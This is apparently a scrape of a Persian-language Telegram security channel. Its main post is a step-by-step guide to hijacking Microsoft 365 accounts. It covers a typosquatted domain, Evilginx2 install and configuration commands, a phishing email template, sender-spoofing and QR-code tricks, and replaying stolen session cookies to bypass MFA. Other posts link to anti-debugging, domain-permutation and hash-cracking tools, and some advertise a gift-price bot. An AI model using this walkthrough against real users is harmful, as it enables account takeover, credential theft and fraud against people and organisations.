ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ

TitanHide
چیه؟
یه درایوره که کمک میکنه دیباگر (Debugger) رو از دید بعضی برنامه‌ها مخفی کنی
با یه ترفندهایی توی کرنل ویندوز (مثل هوک کردن توابع سیستمی) کاری می‌کنه برنامه نفهمه داره دیباگ میشه
فقط کافیه id پردازش و گزینه‌هایی که می‌خوای مخفی بشن رو بهش بدی خودش بقیه کارها رو میکنه
https://github.com/mrexodia/TitanHide

⚜️ @Expire_Security ⚜️

GitHub

GitHub - mrexodia/TitanHide: Hiding kernel-driver for x86/x64.

Hiding kernel-driver for x86/x64. Contribute to mrexodia/TitanHide development by creating an account on GitHub.

🔥1

973 viewsedited 10:54

ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ

Please open Telegram to view this post

VIEW IN TELEGRAM

19:10

ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ

0:08

This media is not supported in your browser

VIEW IN TELEGRAM

⚜️ @Expire_Security ⚜️

815 views23:15

ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ

⭐️

دسترسی به حساب Microsoft 365 که با رمز عبور و تایید دومرحله‌ای MFA محافظت شده بدون نیاز به داشتن رمز یا عبور از MFA

مرحله ۱ ساخت یک سایت جعلی خیلی شبیه سایت اصلی مایکروسافت

کاری که می‌کنیم
یه دامنه تقلبی ثبت می‌کنیم مثلا

m1crosoft-support.com
به جای حرف i از عدد 1 استفاده کردیم

این دامنه باعث میشه کاربر فکر کنه وارد سایت اصلی مایکروسافته

دامنه رو از یه جایی می‌خریم که گواهی امنیتی رایگان HTTPS میده مثل
Namecheap
Porkbun

تنظیم می‌کنیم که این دامنه به سرور ما VPS وصل بشه

مرحله ۲ راه‌اندازی ابزار Evilginx2 روی سرور

Evilginx2 یه ابزار فیشینگ حرفه‌ایه که کمک می‌کنه بدون نیاز به رمز یا MFA توکن ورود Session Token قربانی رو بدزدیم

ما یک سرور مجازی میخوایم یه ایپی پابلیک داشته باشه

نصب ابزارها با دستور

sudo apt update && sudo apt install git make gcc certbot -y
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo ./bin/evilginx

تنظیمات اولیه برای دامنه

config domain m1crosoft-support.com
config ip آی پی سرور شما
config redirect_url https://login.microsoftonline.com
config site microsoft
enable microsoft

گرفتن گواهی امنیتی HTTPS رایگان

sudo certbot certonly --manual -d m1crosoft-support.com --preferred-challenges dns

و بعد فایل‌های امنیتی رو به Evilginx2 معرفی میکنیم

config certpath /etc/letsencrypt/live/m1crosoft-support.com/fullchain.pem

config keypath /etc/letsencrypt/live/m1crosoft-support.com/privkey.pem

مرحله ۳ فرستادن ایمیل جعلی فیشینگ به کاربر هدف

هدف اینه که کاربر روی لینک جعلی کلیک کنه

نمونه متن ایمیل میتونه به این صورت باشه

موضوع : مهم تغییر اجباری رمز حساب Microsoft 365

کاربر گرامی
برای امنیت بیشتر حساب شما لطفا با کلیک روی لینک زیر رمز عبور خود را تغییر دهید

https://m1crosoft-support com/auth

ترفندهایی که میتونیم بزنیم:

جعل فرستنده ایمیل طوری که از طرف Microsoft به نظر برسه

استفاده از لینک‌های کوتاه یا QR Code برای پنهان کردن لینک جعلی

ارسال ایمیل در ساعات اداری برای افزایش احتمال کلیک

مرحله ۴ دزدیدن Session Token بعد از کلیک کاربر

وقتی کاربر روی لینک کلیک می‌کنه

سایت جعلی ما باز میشه
Evilginx2 اطلاعات ورود کاربر رو می‌گیره ولی هم‌زمان کاربر واقعا وارد Microsoft میشه
در پشت صحنه ما توکن‌های ورود Session Token رو از مرورگر کاربر می‌گیریم

مثلا چیزی شبیه این توی لاگ‌ها ظاهر میشه

Captured new credentials
Username user@company.com
Session Tokens {...}

مرحله ۵ ورود به حساب Microsoft 365 بدون رمز یا MFA

الان که توکن‌ها رو داریم نیازی به رمز عبور یا تایید MFA نیست

برای استفاده از توکن

مرورگر مثلا Chrome رو باز کن
یه تب مخفی incognito باز کن
برو به DevTools F12 تب Application بخش Cookies
مقادیر توکن کاربر که از Evilginx گرفتی رو به کوکی‌ها اضافه کن
صفحه Microsoft 365 رو ریفرش کن

ورود موفقیت آمیز بدون رمز و بدون MFA انجام میشه

#red_team
#phising
#Evilginx2

⚜️ @Expire_Security ⚜️

Please open Telegram to view this post

VIEW IN TELEGRAM

GitHub

GitHub - kgretzky/evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session…

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication - kgretzky/evilginx2

❤3

1.27K views08:21

ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ

مرحله ۱ ساخت یک سایت جعلی خیلی شبیه سایت اصلی مایکروسافت

برای این هم میتونیم از ابزار هایی که وظیفشون تولید همچین دامین هایی هست استفاده کنیم که نمونش
ابزار
dnstwist
هست

https://github.com/elceef/dnstwist

که میتونه دامنه هایی که قبلا تولید شده رو هم نشون بده

⚜️ @Expire_Security ⚜️

GitHub

GitHub - elceef/dnstwist: Domain name permutation engine for detecting homograph phishing attacks, typo squatting, and brand impersonation

Domain name permutation engine for detecting homograph phishing attacks, typo squatting, and brand impersonation - elceef/dnstwist

❤3

1.73K views08:28

ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ

QLPro.pdf

1.8 MB

QLPro: Automated Code Vulnerability Discovery via LLM and Static
Code Analysis Integration

⚜️ @Expire_Security ⚜️

1.74K views=), 06:23

ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ

⭕️

وب سرویس پیشرفته قیمت گیفت

⭕️

⚙هم قیمت پورتال میده هم تونل و هم مارکت

🔵

🕦 تغییرات ۲۴ ساعته و هفتگی 🕦

🖥 نمایش مقدار سود ضرر گیفت 🖥

😵

🤔

🙁

😝

@Dev_Clown

😤

☹️

🙁

☹️

Please open Telegram to view this post

VIEW IN TELEGRAM

4.41K viewsedited 17:52

ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ

Cybersecurity AI (CAI), an open Bug Bounty-ready Artificial Intelligence

https://github.com/aliasrobotics/cai

⚜️ @Expire_Security ⚜️

GitHub

GitHub - aliasrobotics/cai: Cybersecurity AI (CAI), the framework for AI Security

Cybersecurity AI (CAI), the framework for AI Security - aliasrobotics/cai

6.59K views18:56

ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ

🔎Searches Hash APIs to crack your hash quickly🔎 If hash is not found, automatically pipes into HashCat⚡

https://github.com/bee-san/Search-That-Hash

⚜️ @Expire_Security ⚜️

GitHub

GitHub - bee-san/Search-That-Hash: 🔎Searches Hash APIs to crack your hash quickly🔎 If hash is not found, automatically pipes into…

🔎Searches Hash APIs to crack your hash quickly🔎 If hash is not found, automatically pipes into HashCat⚡ - bee-san/Search-That-Hash

10.3K

12.5K views18:38

ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ

🔥 برای دریافت قیمت گیفت خود کافی است لینک گیفت را ارسال کنید. مانند:
t.me/nft/VintageCigar-10319

💥 یا اسم گیفت را به همراه علامت سوال وارد کنید. مانند:
Pepe?

🆔 @EX_Panel_Bot 🆔

13.3K❤3🤡1

14.8K views13:22

ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ

🔥

ایده و کانسپت من برای گیفت‌های مناسبتی:
سوزاندن گیفت‌های قدیمی برای خرید گیفت‌های جدید.

از اون‌جایی که احتمالاً قراره بی‌نهایت گیفت مناسبتی داشته باشیم، به نظرم خیلی خوب میشه اگه خرید بعضی از این گیفت‌ها نیاز به سوزوندن گیفت‌های قدیمی همون مناسبت داشته باشه. 📈

مثلاً برای خرید گیفت 🎁 در ولنتاین، کاربر ابتدا باید یکی از گیفت‌های 🎁 یا 🎁 که مربوط به ولنتاین قبلی بودن رو بسوزونه و سپس با پرداخت استارز گیفت جدید رو بخره.

• چرا ایده خوبیه؟
- از خرید انبوه ربات‌ها خلاص میشیم.
- ساپلای گیفت‌های قدیمی کم میشه.
- هربار گیفت جدید میاد به جای اینکه گیفت‌های قدیمی فراموش و بی‌ارزش بشن، ارزششون بالاتر میره.
- سوزوندن صرفا قفل خریدن رو باز میکنه و نیازه که بعدش استارز پرداخت بشه، پس تلگرام ضرری نمیکنه و همه چیز دو سر سود هست.

Please open Telegram to view this post

VIEW IN TELEGRAM

Please open Telegram to view this post

VIEW IN TELEGRAM

48K❤2🤡2🔥1

9.32K views‹nima›, 09:25

ᎬᏡᏢᏆᏒᎬ ᎢᎬᎪᎷ

🔥 ایده و کانسپت من برای گیفت‌های مناسبتی: سوزاندن گیفت‌های قدیمی برای خرید گیفت‌های جدید. از اون‌جایی که احتمالاً قراره بی‌نهایت گیفت مناسبتی داشته باشیم، به نظرم خیلی خوب میشه اگه خرید بعضی از این گیفت‌ها نیاز به سوزوندن گیفت‌های قدیمی همون مناسبت داشته…

نسخه انگلیسی کانسپت رو توی ربات پیشنهادات تلگرام قرار دادم. لطفا برین داخلش و لایک کنین، کامنت بزارین و share کنین تا به نتیجه برسیم. 📈

👉

https://t.me/bugs?startapp=c-55998

Please open Telegram to view this post